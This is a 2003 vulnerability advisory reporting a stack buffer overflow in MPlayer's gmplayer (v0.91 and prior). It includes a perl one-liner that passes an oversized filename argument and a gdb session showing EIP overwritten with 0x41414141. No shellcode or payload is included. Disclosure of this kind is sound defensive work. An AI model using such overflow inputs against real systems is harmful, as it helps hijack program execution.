('binary' encoding is not supported, stored as-is)
-------------------------------------------------
No System Group - Advisory #2 - 01/09/03
-------------------------------------------------
Program: MPlayer - The Movie Player for Linux
Homepage:
http://www.mplayerhq.hu
Vulnerable Versions: Mplayer v0.91 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow
-------------------------------------------------
- DESCRIPTION
-------------------------------------------------
MPlayer is a movie player for LINUX (runs on many
other Unices, and non-x86 CPUs, see the documentation).
It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV,
QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA
files, supported by many native, XAnim, and Win32 DLL codecs.
More informations at:
http://www.mplayerhq.hu
- DETAILS
-------------------------------------------------
bash-2.05b$ gmplayer `perl -e 'print "A" x 550'`
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale
Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
MPlayer interrupted by signal 11 in module: unknown
- MPlayer crashed by bad usage of CPU/FPU/RAM.
Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
disassembly. For details, see DOCS/bugreports.html#crash.b.
- MPlayer crashed. This shouldn't happen.
It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc
version. If you think it's MPlayer's fault, please read
DOCS/bugreports.html
and follow the instructions there. We can't and won't help unless you
provide
this information when reporting a possible bug.
Now we proceed to open gdb to view what may have occured.
$gdb gmplayer
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 550'`
Starting program: /usr/local/bin/gmplayer ` perl -e 'print "A" x 550'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 16384 (LWP 2044)]
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale
MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS)
Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 2044)]
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbfffd0b0 0xbfffd0b0
(gdb)
Tested in Slackware Linux 9.0
NOTE: The program 'gmplayer' isn't SUID by default.
- SOLUTIONS
-------------------------------------------------
Update the program to latest version
- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-02.txt
- CREDITS
-------------------------------------------------
Discovered by CoKi <coki_at_interlap.com.ar>
No System Group -
http://www.nosystem.com.ar
Received on Sep 02 2003
Intro
